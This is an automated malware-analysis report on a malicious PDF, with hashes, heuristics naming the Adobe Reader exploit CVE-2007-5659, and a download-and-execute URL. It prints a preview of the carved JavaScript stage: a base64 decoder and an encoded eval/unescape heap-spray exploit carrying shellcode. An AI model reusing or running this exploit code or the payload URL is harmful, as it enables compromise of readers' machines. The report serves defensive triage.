PDF malware analysis — malicious · c3e1006c5fad3870

MALICIOUS

PDF

3.0 KB First seen: 2026-05-11

MD5: fe93656505d0ef0a570d6d91aadff3a3 SHA-1: f7ea960b037b112abf5cdca9fae42f6124250cbf SHA-256: c3e1006c5fad38703d649da606a85401ca10085d8b00ac0e3ee8a0298accd0bd

258 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file was flagged by an ML classifier as malicious with a very high score. Static analysis revealed embedded JavaScript, which is further indicated by the 'PDF_JAVASCRIPT' and 'PDF_JS' heuristics. The JavaScript stream, named 'javascript_obj0009_000.js', is likely responsible for downloading and executing a second-stage payload. The 'ML_NYX_PDF_MALICIOUS' heuristic strongly supports the malicious nature of this document.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 8

Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659

PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
JavaScript action low 3 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
Matched line in script
```
      chr3 = ((enc3 & 3) << 6) | enc4;
      output = output + String.fromCharCode(chr1);
      if (enc3 != 64) {
```
PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL

Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY

Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://tthhllkk.info//getexe.php?spl=pdf_exp Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0009_000.js`	pdf-javascript-stream	PDF /JS object 9 at offset 0xD6	20473 bytes
SHA-256: `fde62536e604264faec74db8c79b1ef3a83492d6a6aa0ecacc09a6fa8d405cf7`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 3 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script var keyXXXStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; function decode64(input) { var output = ""; var chr1, chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); do { enc1 = keyXXXStr.indexOf(input.charAt(i++)); enc2 = keyXXXStr.indexOf(input.charAt(i++)); enc3 = keyXXXStr.indexOf(input.charAt(i++)); enc4 = keyXXXStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) \| (enc2 >> 4); chr2 = ((enc2 & 15) << 4) \| (enc3 >> 2); chr3 = ((enc3 & 3) << 6) \| enc4; output = output + String.fromCharCode(chr1); if (enc3 != 64) { output = output + String.fromCharCode(chr2); } if (enc4 != 64) { output = output + String.fromCharCode(chr3); } } while (i < input.length); return output; } var aasd = decode64("CiB2YXIgTlBBN0xRVHhpID0gbmV3IEFycmF5KCk7CiB2YXIgeW1mWm1lWWFiOwogdmFyIGxhdmUgPSBldmFsOwogIGxhdmUodW5lc2NhcGUoIiUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU3MiUzMCU1YSU2NSU2YyUzNSU2YyU2ZiU1NyUyOCU1MSUzOCU1NyU0ZiU2YiU0OCU3MCU0ZiU3NCUyYyUyMCU0ZSU0YyU3MSU0ZSU0ZCU2ZCU2ZSU2NyU0ZSUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU3NyU2OCU2OSU2YyU2NSUyOCU1MSUzOCU1NyU0ZiU2YiU0OCU3MCU0ZiU3NCUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUyYSUyMCUzMiUyMCUzYyUyMCU0ZSU0YyU3MSU0ZSU0ZCU2ZCU2ZSU2NyU0ZSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU1MSUzOCU1NyU0ZiU2YiU0OCU3MCU0ZiU3NCUyMCUyYiUzZCUyMCU1MSUzOCU1NyU0ZiU2YiU0OCU3MCU0ZiU3NCUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU1MSUzOCU1NyU0ZiU2YiU0OCU3MCU0ZiU3NCUyMCUzZCUyMCU1MSUzOCU1NyU0ZiU2YiU0OCU3MCU0ZiU3NCUyZSU3MyU3NSU2MiU3MyU3NCU3MiU2OSU2ZSU2NyUyOCUzMCUyYyUyMCU0ZSU0YyU3MSU0ZSU0ZCU2ZCU2ZSU2NyU0ZSUyMCUyZiUyMCUzMiUyOSUzYiUyMCUyMCUyMCUyMCU3MiU2NSU3NCU3NSU3MiU2ZSUyMCU1MSUzOCU1NyU0ZiU2YiU0OCU3MCU0ZiU3NCUzYiUyMCUyMCU3ZCUyMCIpKTsgIGxhdmUodW5lc2NhcGUoIiUyMCUyMCUyMCU2NiU3NSU2ZSU2MyU3NCU2OSU2ZiU2ZSUyMCU1MyU2NCUzOCUzNCU3MiU0ZSUzNiU3NCU2MSUyOCU0MyU2NSU2YSU0YiU1NiUzMyU2NiU0ZiU0YSUyOSUyMCUyMCU3YiUyMCUyMCUyMCUyMCU2OSU2NiUyOCU0MyU2NSU2YSU0YiU1NiUzMyU2NiU0ZiU0YSUyMCUzZCUzZCUyMCUzMCUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0NiU0ZCU0YSU1MCU3NyU2MSU1MCU1OSU1NyUyMCUzZCUyMCUzMCU3OCUzMCU2MyUzMCU2MyUzMCU2MyUzMCU2MyUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3NCUzNyU1NiU2NiU0ZiU2ZiU2MiU1NiU2MiUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzNiUzNiU0MSU0MiUyNSU3NSUzNiUzNiUzOSUzOCUyNSU3NSU0MiUzMCU0MSU0MiUyNSU3NSUzOCU0MSUzNiU0MyUyNSU3NSUzOSUzOCU0NSUzMCUyNSU3NSUzNiUzOCUzNSUzMCUyNSU3NSUzNiU0NSUzNiU0NiUyNSU3NSUzNiUzNCUzMiU0NSUyNSU3NSUzNyUzNSUzNiUzOCUyNSU3NSUzNiU0MyUzNyUzMiUyNSU3NSUzNSUzNCUzNiU0NCUyNSU3NSUzOCU0NSU0MiUzOCUyNSU3NSUzMCU0NSUzNCU0NSUyNSU3NSU0NiU0NiU0NSU0MyUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzMCUzOSUzMyUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzNSUzMCUzNSUzMCUyNSU3NSUzOCU0MiUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSU0MyUzMiUzOCUzMyUyNSU3NSUzOCUzMyUzNyU0NiUyNSU3NSUzMyUzMSU0MyUzMiUyNSU3NSUzNSUzMCUzNSUzMiUyNSU3NSUzMyUzNiU0MiUzOCUyNSU3NSUzMiU0NiUzMSU0MSUyNSU3NSU0NiU0NiUzNyUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzMyUzMyUzNSU0MiUyNSU3NSUzNSUzNyU0NiU0NiUyNSU3NSU0MiUzOCUzNSUzNiUyNSU3NSU0NiU0NSUzOSUzOCUyNSU3NSUzMCU0NSUzOCU0MSUyNSU3NSUzNSUzNSU0NiU0NiUyNSU3NSUzNSUzNyUzMCUzNCUyNSU3NSU0NSU0NiU0MiUzOCUyNSU3NSU0NSUzMCU0MyU0NSUyNSU3NSU0NiU0NiUzNiUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNyUzNCUzNiUzOCUyNSU3NSUzNyUzMCUzNyUzNCUyNSU3NSUzMiU0NiUzMyU0MSUyNSU3NSUzNyUzNCUzMiU0NiUyNSU3NSUzNiUzOCUzNyUzNCUyNSU3NSUzNiU0MyUzNiUzOCUyNSU3NSUzNiU0MiUzNiU0MyUyNSU3NSUzMiU0NSUzNiU0MiUyNSU3NSUzNiU0NSUzNiUzOSUyNSU3NSUzNiU0NiUzNiUzNiUyNSU3NSUzMiU0NiUzMiU0NiUyNSU3NSUzNiUzNSUzNiUzNyUyNSU3NSUzNiUzNSUzNyUzNCUyNSU3NSUzNiUzNSUzNyUzOCUyNSU3NSUzNyUzMCUzMiU0NSUyNSU3NSUzNyUzMCUzNiUzOCUyNSU3NSUzNyUzMyUzMyU0NiUyNSU3NSUzNiU0MyUzNyUzMCUyNSU3NSUzNyUzMCUzMyU0NCUyNSU3NSUzNiUzNiUzNiUzNCUyNSU3NSUzNiUzNSUzNSU0NiUyNSU3NSUzNyUzMCUzNyUzOCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU2NSU2YyU3MyU2NSUyMCU2OSU2NiUyOCU0MyU2NSU2YSU0YiU1NiUzMyU2NiU0ZiU0YSUyMCUzZCUzZCUyMCUzMSUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU0NiU0ZCU0YSU1MCU3NyU2MSU1MCU1OSU1NyUyMCUzZCUyMCUzMCU3OCUzMyUzMCUzMyUzMCUzMyUzMCUzMyUzMCUzYiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3NCUzNyU1NiU2NiU0ZiU2ZiU2MiU1NiU2MiUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzNiUzNiU0MSU0MiUyNSU3NSUzNiUzNiUzOSUzOCUyNSU3NSU0MiUzMCU0MSU0MiUyNSU3NSUzOCU0MSUzNiU0MyUyNSU3NSUzOSUzOCU0NSUzMCUyNSU3NSUzNiUzOCUzNSUzMCUyNSU3NSUzNiU0NSUzNiU0NiUyNSU3NSUzNiUzNCUzMiU0NSUyNSU3NSUzNyUzNSUzNiUzOCUyNSU3NSUzNiU0MyUzNyUzMiUyNSU3NSUzNSUzNCUzNiU0NCUyNSU3NSUzOCU0NSU0MiUzOCUyNSU3NSUzMCU0NSUzNCU0NSUyNSU3NSU0NiU0NiU0NSU0MyUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzMCUzOSUzMyUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzNSUzMCUzNSUzMCUyNSU3NSUzOCU0MiUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSU0MyUzMiUzOCUzMyUyNSU3NSUzOCUzMyUzNyU0NiUyNSU3NSUzMyUzMSU0MyUzMiUyNSU3NSUzNSUzMCUzNSUzMiUyNSU3NSUzMyUzNiU0MiUzOCUyNSU3NSUzMiU0NiUzMSU0MSUyNSU3NSU0NiU0NiUzNyUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzMyUzMyUzNSU0MiUyNSU3NSUzNSUzNyU0NiU0NiUyNSU3NSU0MiUzOCUzNSUzNiUyNSU3NSU0NiU0NSUzOSUzOCUyNSU3NSUzMCU0NSUzOCU0MSUyNSU3NSUzNSUzNSU0NiU0NiUyNSU3NSUzNSUzNyUzMCUzNCUyNSU3NSU0NSU0NiU0MiUzOCUyNSU3NSU0NSUzMCU0MyU0NSUyNSU3NSU0NiU0NiUzNiUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNyUzNCUzNiUzOCUyNSU3NSUzNyUzMCUzNyUzNCUyNSU3NSUzMiU0NiUzMyU0MSUyNSU3NSUzNyUzNCUzMiU0NiUyNSU3NSUzNiUzOCUzNyUzNCUyNSU3NSUzNiU0MyUzNiUzOCUyNSU3NSUzNiU0MiUzNiU0MyUyNSU3NSUzMiU0NSUzNiU0MiUyNSU3NSUzNiU0NSUzNiUzOSUyNSU3NSUzNiU0NiUzNiUzNiUyNSU3NSUzMiU0NiUzMiU0NiUyNSU3NSUzNiUzNSUzNiUzNyUyNSU3NSUzNiUzNSUzNyUzNCUyNSU3NSUzNiUzNSUzNyUzOCUyNSU3NSUzNyUzMCUzMiU0NSUyNSU3NSUzNyUzMCUzNiUzOCUyNSU3NSUzNyUzMyUzMyU0NiUyNSU3NSUzNiU0MyUzNyUzMCUyNSU3NSUzNyUzMCUzMyU0NCUyNSU3NSUzNiUzNiUzNiUzNCUyNSU3NSUzNiUzNSUzNSU0NiUyNSU3NSUzNyUzMCUzNyUzOCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU2NSU2YyU3MyU2NSUyMCU2OSU2NiUyOCU0MyU2NSU2YSU0YiU1NiUzMyU2NiU0ZiU0YSUyMCUzZCUzZCUyMCUzMiUyOSUyMCUyMCUyMCUyMCU3YiUyMCUyMCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU3NCUzNyU1NiU2NiU0ZiU2ZiU2MiU1NiU2MiUyMCUzZCUyMCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzOCU0MiUzNiUzNCUyNSU3NSUzMyUzMCUzNCUzMCUyNSU3NSUzMCU0MyUzNyUzOCUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0MiUzMCU0MyUyNSU3NSUzMSU0MyUzNyUzMCUyNSU3NSUzOCU0MiU0MSU0NCUyNSU3NSUzMCUzOCUzNSUzOCUyNSU3NSUzMCUzOSU0NSU0MiUyNSU3NSUzNCUzMCUzOCU0MiUyNSU3NSUzOCU0NCUzMyUzNCUyNSU3NSUzNyU0MyUzNCUzMCUyNSU3NSUzNSUzOCUzOCU0MiUyNSU3NSUzNiU0MSUzMyU0MyUyNSU3NSUzNSU0MSUzNCUzNCUyNSU3NSU0NSUzMiU0NCUzMSUyNSU3NSU0NSUzMiUzMiU0MiUyNSU3NSU0NSU0MyUzOCU0MiUyNSU3NSUzNCU0NiU0NSU0MiUyNSU3NSUzNSUzMiUzNSU0MSUyNSU3NSU0NSU0MSUzOCUzMyUyNSU3NSUzOCUzOSUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzNyUzNSUzNiUyNSU3NSUzNyUzMyUzOCU0MiUyNSU3NSUzOCU0MiUzMyU0MyUyNSU3NSUzMyUzMyUzNyUzNCUyNSU3NSUzMCUzMyUzNyUzOCUyNSU3NSUzNSUzNiU0NiUzMyUyNSU3NSUzNyUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzMCUyNSU3NSUzMyUzMyU0NiUzMyUyNSU3NSUzNCUzOSU0MyUzOSUyNSU3NSUzNCUzMSUzNSUzMCUyNSU3NSUzMyUzMyU0MSU0NCUyNSU3NSUzMyUzNiU0NiU0NiUyNSU3NSU0MiU0NSUzMCU0NiUyNSU3NSUzMCUzMyUzMSUzNCUyNSU3NSU0NiUzMiUzMyUzOCUyNSU3NSUzMCUzOCUzNyUzNCUyNSU3NSU0MyU0NiU0MyUzMSUyNSU3NSUzMCUzMyUzMCU0NCUyNSU3NSUzNCUzMCU0NiU0MSUyNSU3NSU0NSU0NiU0NSU0MiUyNSU3NSUzMyU0MiUzNSUzOCUyNSU3NSUzNyUzNSU0NiUzOCUyNSU3NSUzNSU0NSU0NSUzNSUyNSU3NSUzNCUzNiUzOCU0MiUyNSU3NSUzMCUzMyUzMiUzNCUyNSU3NSUzNiUzNiU0MyUzMyUyNSU3NSUzMCU0MyUzOCU0MiUyNSU3NSUzOCU0MiUzNCUzOCUyNSU3NSUzMSU0MyUzNSUzNiUyNSU3NSU0NCUzMyUzMCUzMyUyNSU3NSUzMCUzNCUzOCU0MiUyNSU3NSUzMCUzMyUzOCU0MSUyNSU3NSUzNSU0NiU0MyUzMyUyNSU3NSUzNSUzMCUzNSU0NSUyNSU3NSUzOCU0NCU0MyUzMyUyNSU3NSUzMCUzOCUzNyU0NCUyNSU3NSUzNSUzMiUzNSUzNyUyNSU3NSUzMyUzMyU0MiUzOCUyNSU3NSUzOCU0MSU0MyU0MSUyNSU3NSU0NSUzOCUzNSU0MiUyNSU3NSU0NiU0NiU0MSUzMiUyNSU3NSU0NiU0NiU0NiU0NiUyNSU3NSU0MyUzMCUzMyUzMiUyNSU3NSU0NiUzNyUzOCU0MiUyNSU3NSU0MSU0NSU0NiUzMiUyNSU3NSU0MiUzOCUzNCU0NiUyNSU3NSUzMiU0NSUzNiUzNSUyNSU3NSUzNyUzOCUzNiUzNSUyNSU3NSUzNiUzNiU0MSU0MiUyNSU3NSUzNiUzNiUzOSUzOCUyNSU3NSU0MiUzMCU0MSU0MiUyNSU3NSUzOCU0MSUzNiU0MyUyNSU3NSUzOSUzOCU0NSUzMCUyNSU3NSUzNiUzOCUzNSUzMCUyNSU3NSUzNiU0NSUzNiU0NiUyNSU3NSUzNiUzNCUzMiU0NSUyNSU3NSUzNyUzNSUzNiUzOCUyNSU3NSUzNiU0MyUzNyUzMiUyNSU3NSUzNSUzNCUzNiU0NCUyNSU3NSUzOCU0NSU0MiUzOCUyNSU3NSUzMCU0NSUzNCU0NSUyNSU3NSU0NiU0NiU0NSU0MyUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNSUzMCUzOSUzMyUyNSU3NSU0MyUzMCUzMyUzMyUyNSU3NSUzNSUzMCUzNSUzMCUyNSU3NSUzOCU0MiUzNSUzNiUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSU0MyUzMiUzOCUzMyUyNSU3NSUzOCUzMyUzNyU0NiUyNSU3NSUzMyUzMSU0MyUzMiUyNSU3NSUzNSUzMCUzNSUzMiUyNSU3NSUzMyUzNiU0MiUzOCUyNSU3NSUzMiU0NiUzMSU0MSUyNSU3NSU0NiU0NiUzNyUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzMyUzMyUzNSU0MiUyNSU3NSUzNSUzNyU0NiU0NiUyNSU3NSU0MiUzOCUzNSUzNiUyNSU3NSU0NiU0NSUzOSUzOCUyNSU3NSUzMCU0NSUzOCU0MSUyNSU3NSUzNSUzNSU0NiU0NiUyNSU3NSUzNSUzNyUzMCUzNCUyNSU3NSU0NSU0NiU0MiUzOCUyNSU3NSU0NSUzMCU0MyU0NSUyNSU3NSU0NiU0NiUzNiUzMCUyNSU3NSUzMCUzNCUzNSUzNSUyNSU3NSUzNyUzNCUzNiUzOCUyNSU3NSUzNyUzMCUzNyUzNCUyNSU3NSUzMiU0NiUzMyU0MSUyNSU3NSUzNyUzNCUzMiU0NiUyNSU3NSUzNiUzOCUzNyUzNCUyNSU3NSUzNiU0MyUzNiUzOCUyNSU3NSUzNiU0MiUzNiU0MyUyNSU3NSUzMiU0NSUzNiU0MiUyNSU3NSUzNiU0NSUzNiUzOSUyNSU3NSUzNiU0NiUzNiUzNiUyNSU3NSUzMiU0NiUzMiU0NiUyNSU3NSUzNiUzNSUzNiUzNyUyNSU3NSUzNiUzNSUzNyUzNCUyNSU3NSUzNiUzNSUzNyUzOCUyNSU3NSUzNyUzMCUzMiU0NSUyNSU3NSUzNyUzMCUzNiUzOCUyNSU3NSUzNyUzMyUzMyU0NiUyNSU3NSUzNiU0MyUzNyUzMCUyNSU3NSUzNyUzMCUzMyU0NCUyNSU3NSUzNiUzNiUzNiUzNCUyNSU3NSUzNiUzNSUzNSU0NiUyNSU3NSUzNyUzMCUzNyUzOCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU3ZCUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0MiU3NyU2MyU0MSU3MSU1OCUzMiU0NCU3OSUyMCUzZCUyMCUzMCU3OCUzNCUzMCUzMCUzMCUzMCUzMCUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU2YiU1YSU1NiUzNyU3MiUzOCU2OSU2MyU2ZCUyMCUzZCUyMCU3NCUzNyU1NiU2NiU0ZiU2ZiU2MiU1NiU2MiUyZSU2YyU2NSU2ZSU2NyU3NCU2OCUyMCUyYSUyMCUzMiUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU0ZSU0YyU3MSU0ZSU0ZCU2ZCU2ZSU2NyU0ZSUyMCUzZCUyMCU0MiU3NyU2MyU0MSU3MSU1OCUzMiU0NCU3OSUyMCUyZCUyMCUyOCU2YiU1YSU1NiUzNyU3MiUzOCU2OSU2MyU2ZCUyMCUyYiUyMCUzMCU3OCUzMyUzOCUyOSUzYiUyMCUyMCUyMCUyMCU3NiU2MSU3MiUyMCU1MSUzOCU1NyU0ZiU2YiU0OCU3MCU0ZiU3NCUyMCUzZCUyMCU3NSU2ZSU2NSU3MyU2MyU2MSU3MCU2NSUyOCUyMiUyNSU3NSUzOSUzMCUzOSUzMCUyNSU3NSUzOSUzMCUzOSUzMCUyMiUyOSUzYiUyMCUyMCUyMCUyMCU1MSUzOCU1NyU0ZiU2YiU0OCU3MCU0ZiU3NCUyMCUzZCUyMCU3MiUzMCU1YSU2NSU2YyUzNSU2YyU2ZiU1NyUyOCU1MSUzOCU1NyU0ZiU2YiU0OCU3MCU0ZiU3NCUyYyUyMCU0ZSU0YyU3MS